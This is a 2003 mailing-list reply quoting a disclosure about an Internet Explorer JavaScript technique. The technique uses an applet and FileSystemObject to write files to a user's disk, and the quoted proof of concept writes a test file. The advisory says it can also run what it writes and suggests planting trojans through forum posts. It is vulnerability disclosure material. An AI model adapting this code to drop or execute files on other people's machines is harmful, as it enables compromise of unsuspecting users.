Vulnerability Development mailing list archives
Re: Internet Explorer JavaScript insecure function
From: npguy <npguy () websurfer com np>
Date: Tue, 9 Dec 2003 08:01:10 +0545
Hi freebrain, exploit not working in ie6. urs `Proof of concept` require `applet` in html. could u please post an html? Sunday, December 7, 2003, 8:41:57 PM, you wrote: F> * Internet Explorer JavaScript insecure function * F> Product: Microsoft Internet Explorer F> Version: 5.x (probabily other versions may be affected) F> *** F> Problem: F> I discovered a javascript function (interpreted by Internet Explorer) called F> "file.writeline()" may be F> potentially dangerous for Internet Explorer users. This function allows to F> write files by means of F> JavaScript on a hard disk. F> An attacker may use this function writting JavaScript code in posts of F> forums, guestbooks, etc for owning F> his victim's computers. With "file.writeline()" function the attacker can F> write trojans/virus/etc on his F> victim's hard disks, for example, an attacker may use JavaScript F> "file.writeline()" function for writting F> a malicious file in VBS (Visual Basic Scripting) language. F> I repeat, this may be potentially dangerous for Internet Explorer users. F> NOTE: Actually a virus in the wild that affects to mIRC users is using this F> function ("file.writeline"). F> NOTE2: As you can see on the "Proof of concept", other functions are needed F> to carry out an "intrusion". F> *** F> Proof of concept: F> InterfaceObject=document.applets[0]; F> setTimeout("Write()",1000); F> function Write() { F> fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}"; F> InterfaceObject.setCLSID(fsoClassID); F> fso = InterfaceObject.createInstance(); F> // windir = fso.getspecialfolder ; F> filename = "\\proof.txt"; F> var filecontent = "Hello world"; F> file = fso.opentextfile(filename, "2", "TRUE"); F> file.writeline(filecontent) F> file.close(); F> } F> This code writes a file called "proof.txt" in the hard disk, with the F> content "Hello world". Also you can F> execute files you write by means of JavaScript adding "Run();" to the F> function. F> *** F> Solution: F> I'm not sure about the solution but I recommend to upgrade to the last F> version of Internet Explorer. F> Also I recommend webmasters to forbid HTML codes that content this function F> in their forums, guestbooks, etc. F> *** F> Thanks to: F> #disidents,#hackers,#hacker @ irc-phoenix.org F> #disidents,#sleepx,#ayuda_internet @ irc-hispano.org F> Special thanks go to: Impos, |_Tr0mP4s F> (sorry my poor english) F> *** F> By FREEBRAIN F> FREEBRAIN is a member of DisidentS Hacker Team F> http://disidents-team.cjb.net (under construction) - F> http://www.gratisweb.com/disidents F> <freebrain () unionnewbies net> ( www.unionnewbies.net )
Current thread:
- Internet Explorer JavaScript insecure function FREEBRAIN (Dec 08)
- Re: Internet Explorer JavaScript insecure function npguy (Dec 09)
- <Possible follow-ups>
- RE: Internet Explorer JavaScript insecure function Scovetta, Michael V (Dec 08)